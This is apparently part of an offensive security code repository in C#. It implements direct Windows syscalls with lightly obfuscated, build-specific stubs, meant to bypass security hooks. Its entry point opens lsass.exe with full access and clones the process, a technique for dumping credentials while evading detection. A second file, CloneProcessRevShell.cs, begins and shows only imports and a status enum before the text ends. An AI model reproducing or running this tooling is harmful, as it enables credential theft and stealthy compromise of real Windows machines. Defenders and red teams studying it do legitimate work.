createSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, lpBytesBuffer); 590 | } 591 | } 592 | } 593 | 594 | [SuppressUnmanagedCodeSecurity] 595 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 596 | public delegate NTSTATUS ZwCloseX( IntPtr ProcessHandle ); 597 | public static NTSTATUS ZwClose( IntPtr ProcessHandle, ref OSVERSIONINFOEXW osVersionInfo ) 598 | { 599 | byte [] syscall = GetOSVersionAndReturnSyscall( 13, ref osVersionInfo ); 600 | unsafe 601 | { 602 | fixed (byte* ptr = syscall) 603 | { 604 | IntPtr allocMemAddress = (IntPtr)ptr; 605 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 606 | UInt32 size = (uint)syscall.Length; 607 | IntPtr sizeIntPtr = (IntPtr)size; 608 | UInt32 oldprotect = 0; 609 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 610 | ZwCloseX ZwCloseFunc = (ZwCloseX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCloseX)); 611 | return (NTSTATUS)ZwCloseFunc( ProcessHandle ); 612 | } 613 | 614 | } 615 | } 616 | 617 | [SuppressUnmanagedCodeSecurity] 618 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 619 | public delegate NTSTATUS ZwCreateProcessX( out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort ); 620 | public static NTSTATUS ZwCreateProcess( out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort, ref OSVERSIONINFOEXW osVersionInfo ) 621 | { 622 | byte [] syscall = GetOSVersionAndReturnSyscall( 7, ref osVersionInfo ); 623 | unsafe 624 | { 625 | fixed (byte* ptr = syscall) 626 | { 627 | IntPtr allocMemAddress = (IntPtr)ptr; 628 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 629 | UInt32 size = (uint)syscall.Length; 630 | 
IntPtr sizeIntPtr = (IntPtr)size; 631 | UInt32 oldprotect = 0; 632 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo ); 633 | ZwCreateProcessX ZwCreateProcessXFunc = (ZwCreateProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateProcessX)); 634 | return (NTSTATUS)ZwCreateProcessXFunc( out ProcessHandle, DesiredAccess, ObjectAttributes, InheriteFromProcessHandle, InheritHandles, SectionHandle, DebugPort, ExceptionPort ); 635 | } 636 | 637 | } 638 | } 639 | 640 | [SuppressUnmanagedCodeSecurity] 641 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 642 | public delegate NTSTATUS ZwAllocateVirtualMemoryX( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect ); 643 | public static NTSTATUS ZwAllocateVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect, ref OSVERSIONINFOEXW osVersionInfo) 644 | { 645 | byte [] syscall = GetOSVersionAndReturnSyscall( 4, ref osVersionInfo ); 646 | unsafe 647 | { 648 | fixed (byte* ptr = syscall) 649 | { 650 | IntPtr allocMemAddress = (IntPtr)ptr; 651 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 652 | UInt32 size = (uint)syscall.Length; 653 | IntPtr sizeIntPtr = (IntPtr)size; 654 | UInt32 oldprotect = 0; 655 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo ); 656 | ZwAllocateVirtualMemoryX ZwAllocateVirtualMemoryFunc = (ZwAllocateVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwAllocateVirtualMemoryX)); 657 | return (NTSTATUS)ZwAllocateVirtualMemoryFunc( ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect ); 658 | 659 | } 660 | } 661 | } 662 | 663 | 664 | [SuppressUnmanagedCodeSecurity] 665 | 
[UnmanagedFunctionPointer(CallingConvention.Cdecl)] 666 | public delegate NTSTATUS RtlGetVersionX( ref OSVERSIONINFOEXW versionInfo ); 667 | public static NTSTATUS RtlGetVersion( ref OSVERSIONINFOEXW versionInfo ) 668 | { 669 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlGetVersion", false); 670 | RtlGetVersionX RtlGetVersionFunc = (RtlGetVersionX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlGetVersionX)); 671 | return (NTSTATUS)RtlGetVersionFunc( ref versionInfo ); 672 | } 673 | 674 | 675 | public static int Zeta() 676 | { 677 | Random number = new Random(); 678 | int code = number.Next(100); 679 | int a, b; 680 | while ( code != 32) 681 | { 682 | code = number.Next(100); 683 | } 684 | a = code; 685 | code = number.Next(100); 686 | while ( code != 32) 687 | { 688 | code = number.Next(100); 689 | } 690 | b = code; 691 | return a + b; 692 | } 693 | 694 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) 695 | { 696 | IntPtr FunctionPtr = IntPtr.Zero; 697 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 698 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 699 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 700 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 701 | Int64 pExport = 0; 702 | if (Magic == 0x010b) 703 | { 704 | pExport = OptHeader + 0x60; 705 | } 706 | else 707 | { 708 | pExport = OptHeader + 0x70; 709 | } 710 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 711 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 712 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 713 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 714 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 715 | Int32 NamesRVA = 
Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 716 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 717 | for (int i = 0; i < NumberOfNames; i++) 718 | { 719 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 720 | if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase)) 721 | { 722 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 723 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 724 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 725 | break; 726 | } 727 | } 728 | return FunctionPtr; 729 | } 730 | 731 | 732 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) 733 | { 734 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 735 | return GetExportAddress(hModule, FunctionName); 736 | } 737 | 738 | public static IntPtr GetLoadedModuleAddress(string DLLName) 739 | { 740 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 741 | foreach (ProcessModule Mod in ProcModules) 742 | { 743 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 744 | { 745 | return Mod.BaseAddress; 746 | } 747 | } 748 | return IntPtr.Zero; 749 | } 750 | 751 | public static byte [] GetOSVersionAndReturnSyscall(byte sysType, ref OSVERSIONINFOEXW osVersionInfo) 752 | { 753 | var syscall = new byte [] { 074, 138, 203, 185, 001, 001, 001, 001, 016, 006, 196 }; 754 | // Client OS Windows 10 build 1803, 1809, 1903, 1909, 2004 755 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 19041)) // 2004 756 | { 757 | // ZwOpenProcess 758 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 759 | // ZwCreateThreadEx 760 | if 
(sysType == 2) { syscall[4] = 194; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 761 | // ZwWriteVirtualMemory 762 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 763 | // ZwAllocateVirtualMemory 764 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 765 | // ZwCreateSection 766 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 767 | // ZwMapViewOfSection 768 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 769 | // ZwCreateProcess 770 | if (sysType == 7) { syscall[4] = 186; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 771 | // ZwOpenThread 772 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x12E); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 773 | // ZwResumeThread 774 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 775 | // ZwWaitForSingleObject 776 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 777 | // ZwSetContextThread 778 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) {syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x18B); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 779 | // ZwGetContextThread 780 | if (sysType == 12) { syscall[4] = 243; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 781 | // ZwClose 782 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 783 | // ZwOpenProcessToken 784 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 785 | // 
ZwSuspendThread 786 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1BC); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 787 | // ZwProtectVirtualMemory 788 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 789 | // ZwCreateProcessEx 790 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 791 | // NtCreateSection 792 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 793 | // NtMapViewOfSection 794 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 795 | // RtlCreateUserThread 796 | if (sysType == 20) { syscall[4] = 1; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } 797 | } else 798 | 799 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 18362 || osVersionInfo.dwBuildNumber == 18363)) // 1903 1909 800 | { 801 | // NtOpenProcess 802 | if (sysType == 1) {syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 803 | // NtCreateThreadEx 804 | if (sysType == 2) { syscall[4] = 190; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 805 | // ZwWriteVirtualMemory 806 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 807 | // NtAllocateVirtualMemory 808 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 809 | // ZwCreateSection 810 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 811 | // ZwMapViewOfSection 812 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 813 | // ZwCreateProcess 814 | if (sysType == 
7) { syscall[4] = 182; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 815 | // ZwOpenThread 816 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 817 | // ZwResumeThread 818 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 819 | // ZwWaitForSingleObject 820 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 821 | // ZwSetContextThread 822 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 823 | // ZwGetContextThread 824 | if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 825 | // ZwClose 826 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 827 | // ZwOpenProcessToken 828 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x123); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 829 | // ZwSuspendThread 830 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 831 | // ZwProtectVirtualMemory 832 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 833 | // ZwCreateProcessEx 834 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 835 | // NtCreateSection 836 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 837 | // NtMapViewOfSection 838 
| if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 839 | } else 840 | 841 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17134)) // 1803 842 | { 843 | // ZwOpenProcess 844 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 845 | // ZwCreateThreadEx 846 | if (sysType == 2) { syscall[4] = 188; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 847 | // ZwWriteVirtualMemory 848 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 849 | // ZwAllocateVirtualMemory 850 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 851 | // ZwCreateSection 852 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 853 | // ZwMapViewOfSection 854 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 855 | // ZwCreateProcess 856 | if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 857 | // ZwOpenThread 858 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 859 | // ZwResumeThread 860 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 861 | // ZwWaitForSingleObject 862 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 863 | // ZwSetContextThread 864 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 865 | // ZwGetContextThread 866 | if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 867 | // ZwClose 868 | 
if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 869 | // ZwOpenProcessToken 870 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x121); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 871 | // ZwSuspendThread 872 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 873 | // ZwProtectVirtualMemory 874 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 875 | // ZwCreateProcessEx 876 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 877 | // NtCreateSection 878 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 879 | // NtMapViewOfSection 880 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 881 | } else 882 | 883 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17763)) // 1809 884 | { 885 | // ZwOpenProcess 886 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 887 | // ZwCreateThreadEx 888 | if (sysType == 2) { syscall[4] = 189; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 889 | // ZwWriteVirtualMemory 890 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 891 | // ZwAllocateVirtualMemory 892 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 893 | // ZwCreateSection 894 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 895 | // ZwMapViewOfSection 896 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ 
i ]--; }} else 897 | // ZwCreateProcess 898 | if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 899 | // ZwOpenThread 900 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 901 | // ZwResumeThread 902 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 903 | // ZwWaitForSingleObject 904 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 905 | // ZwSetContextThread 906 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x184); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 907 | // ZwGetContextThread 908 | if (sysType == 12) { syscall[4] = 237; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 909 | // ZwClose 910 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 911 | // ZwOpenProcessToken 912 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x122); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 913 | // ZwSuspendThread 914 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B5); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 915 | // ZwProtectVirtualMemory 916 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 917 | // ZwCreateProcessEx 918 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 919 | // NtCreateSection 920 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; 
i++) { syscall[ i ]--; }} else 921 | // NtMapViewOfSection 922 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 923 | } // 1809 924 | 925 | return syscall; 926 | } 927 | 928 | 929 | 930 | public static int FindTheRightPID(string processName, string args1, string args2, string args3) 931 | { 932 | int result = 0; 933 | ManagementClass mClass = new ManagementClass("Win32_Process"); 934 | foreach (ManagementObject mObj in mClass.GetInstances()) 935 | { 936 | if ( mObj["Name"].Equals(processName) ) 937 | { 938 | string str1 = Convert.ToString( mObj["CommandLine"] ); 939 | if (str1.Contains(args1) & str1.Contains(args2) & str1.Contains(args3)) 940 | { 941 | result = (int)Convert.ToInt32(mObj["ProcessId"]); 942 | break; 943 | } 944 | } 945 | } 946 | return result; 947 | } 948 | 949 | public static void DllMain() // dll entrypoint 950 | { 951 | 952 | OSVERSIONINFOEXW osVersionInfo = new OSVERSIONINFOEXW { dwOSVersionInfoSize = Marshal.SizeOf(typeof(OSVERSIONINFOEXW)) }; 953 | RtlGetVersion(ref osVersionInfo); 954 | NTSTATUS status; 955 | 956 | OBJECT_ATTRIBUTES ObjAttr = new OBJECT_ATTRIBUTES 957 | { 958 | Length = (ulong)Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES)), 959 | RootDirectory = IntPtr.Zero, 960 | ObjectName = IntPtr.Zero, 961 | Attributes = 0x00000040, 962 | SecurityDescriptor = IntPtr.Zero, 963 | SecurityQualityOfService = IntPtr.Zero 964 | }; 965 | 966 | // Find the running process we like to clone 967 | int ProcId = FindTheRightPID("lsass.exe", "", "", ""); 968 | 969 | Process targetProcess = Process.GetProcessById( ProcId ); 970 | CLIENT_ID clientid = new CLIENT_ID(); 971 | clientid.UniqueThread = new IntPtr(targetProcess.Threads[0].Id); 972 | clientid.UniqueProcess = new IntPtr(targetProcess.Id); 973 | IntPtr procHandle = (IntPtr)clientid.UniqueProcess; 974 | 975 | status = ZwOpenProcess(ref procHandle, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid, ref osVersionInfo); 976 | 
System.Windows.Forms.MessageBox.Show(status.ToString(), "ZwOpenProcess status"); 977 | 978 | IntPtr ProcessHandle = IntPtr.Zero; 979 | status = ZwCreateProcess( out ProcessHandle, ACCESS_MASK.GENERIC_ALL, ObjAttr, procHandle, true, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref osVersionInfo ); 980 | System.Windows.Forms.MessageBox.Show(status.ToString(), "ZwCreateProcess status"); 981 | 982 | System.Windows.Forms.MessageBox.Show("Wait - check if new lsass process is running..."); 983 | 984 | ZwClose(procHandle, ref osVersionInfo); 985 | ZwClose(ProcessHandle, ref osVersionInfo); 986 | } 987 | } 988 | } 989 | -------------------------------------------------------------------------------- /CloneProcessRevShell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Security; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | using System.Runtime.ConstrainedExecution; 6 | using System.Management; 7 | using System.Security.Principal; 8 | using System.Collections.Generic; 9 | using System.ComponentModel; 10 | using System.Security.Permissions; 11 | using Microsoft.Win32.SafeHandles; 12 | using System.Linq; 13 | using System.Reflection; 14 | using System.Security.AccessControl; 15 | using System.Text; 16 | using System.Threading; 17 | using System.Security.Cryptography; 18 | using System.IO; 19 | 20 | namespace code 21 | { 22 | class Program 23 | { 24 | 25 | public enum NTSTATUS : uint 26 | { 27 | Success = 0x00000000, 28 | Wait0 = 0x00000000, 29 | Wait1 = 0x00000001, 30 | Wait2 = 0x00000002, 31 | Wait3 = 0x00000003, 32 | Wait63 = 0x0000003f, 33 | Abandoned = 0x00000080, 34 | AbandonedWait0 = 0x00000080, 35 | AbandonedWait1 = 0x00000081, 36 | AbandonedWait2 = 0x00000082, 37 | AbandonedWait3 = 0x00000083, 38 | AbandonedWait63 = 0x000000bf, 39 | UserApc = 0x000000c0, 40 | KernelApc = 0x00000100, 41 | Alerted = 0x00000101, 42 | Timeout = 0x00000102, 43 | Pending = 0x00000103, 44 | Reparse 
= 0x00000104, 45 | MoreEntries = 0x00000105, 46 | NotAllAssigned = 0x00000106, 47 | SomeNotMapped = 0x00000107, 48 | OpLockBreakInProgress = 0x00000108, 49 | VolumeMounted = 0x00000109, 50 | RxActCommitted = 0x0000010a, 51 | NotifyCleanup = 0x0000010b, 52 | NotifyEnumDir = 0x0000010c, 53 | NoQuotasForAccount = 0x0000010d, 54 | PrimaryTransportConnectFailed = 0x0000010e, 55 | PageFaultTransition = 0x00000110, 56 | PageFaultDemandZero = 0x00000111, 57 | PageFaultCopyOnWrite = 0x00000112, 58 | PageFaultGuardPage = 0x00000113, 59 | PageFaultPagingFile = 0x00000114, 60 | CrashDump = 0x00000116, 61 | ReparseObject = 0x00000118, 62 | NothingToTerminate = 0x00000122, 63 | ProcessNotInJob = 0x00000123, 64 | ProcessInJob = 0x00000124, 65 | ProcessCloned = 0x00000129, 66 | FileLockedWithOnlyReaders = 0x0000012a, 67 | FileLockedWithWriters = 0x0000012b, 68 | Informational = 0x40000000, 69 | ObjectNameExists = 0x40000000, 70 | ThreadWasSuspended = 0x40000001, 71 | WorkingSetLimitRange = 0x40000002, 72 | ImageNotAtBase = 0x40000003, 73 | RegistryRecovered = 0x40000009, 74 | Warning = 0x80000000, 75 | GuardPageViolation = 0x80000001, 76 | DatatypeMisalignment = 0x80000002, 77 | Breakpoint = 0x80000003, 78 | SingleStep = 0x80000004, 79 | BufferOverflow = 0x80000005, 80 | NoMoreFiles = 0x80000006, 81 | HandlesClosed = 0x8000000a, 82 | PartialCopy = 0x8000000d, 83 | DeviceBusy = 0x80000011, 84 | InvalidEaName = 0x80000013, 85 | EaListInconsistent = 0x80000014, 86 | NoMoreEntries = 0x8000001a, 87 | LongJump = 0x80000026, 88 | DllMightBeInsecure = 0x8000002b, 89 | Error = 0xc0000000, 90 | Unsuccessful = 0xc0000001, 91 | NotImplemented = 0xc0000002, 92 | InvalidInfoClass = 0xc0000003, 93 | InfoLengthMismatch = 0xc0000004, 94 | AccessViolation = 0xc0000005, 95 | InPageError = 0xc0000006, 96 | PagefileQuota = 0xc0000007, 97 | InvalidHandle = 0xc0000008, 98 | BadInitialStack = 0xc0000009, 99 | BadInitialPc = 0xc000000a, 100 | InvalidCid = 0xc000000b, 101 | TimerNotCanceled = 0xc000000c, 
102 | InvalidParameter = 0xc000000d, 103 | NoSuchDevice = 0xc000000e, 104 | NoSuchFile = 0xc000000f, 105 | InvalidDeviceRequest = 0xc0000010, 106 | EndOfFile = 0xc0000011, 107 | WrongVolume = 0xc0000012, 108 | NoMediaInDevice = 0xc0000013, 109 | NoMemory = 0xc0000017, 110 | ConflictingAddresses = 0xc0000018, 111 | NotMappedView = 0xc0000019, 112 | UnableToFreeVm = 0xc000001a, 113 | UnableToDeleteSection = 0xc000001b, 114 | IllegalInstruction = 0xc000001d, 115 | AlreadyCommitted = 0xc0000021, 116 | AccessDenied = 0xc0000022, 117 | BufferTooSmall = 0xc0000023, 118 | ObjectTypeMismatch = 0xc0000024, 119 | NonContinuableException = 0xc0000025, 120 | BadStack = 0xc0000028, 121 | NotLocked = 0xc000002a, 122 | NotCommitted = 0xc000002d, 123 | InvalidParameterMix = 0xc0000030, 124 | ObjectNameInvalid = 0xc0000033, 125 | ObjectNameNotFound = 0xc0000034, 126 | ObjectNameCollision = 0xc0000035, 127 | ObjectPathInvalid = 0xc0000039, 128 | 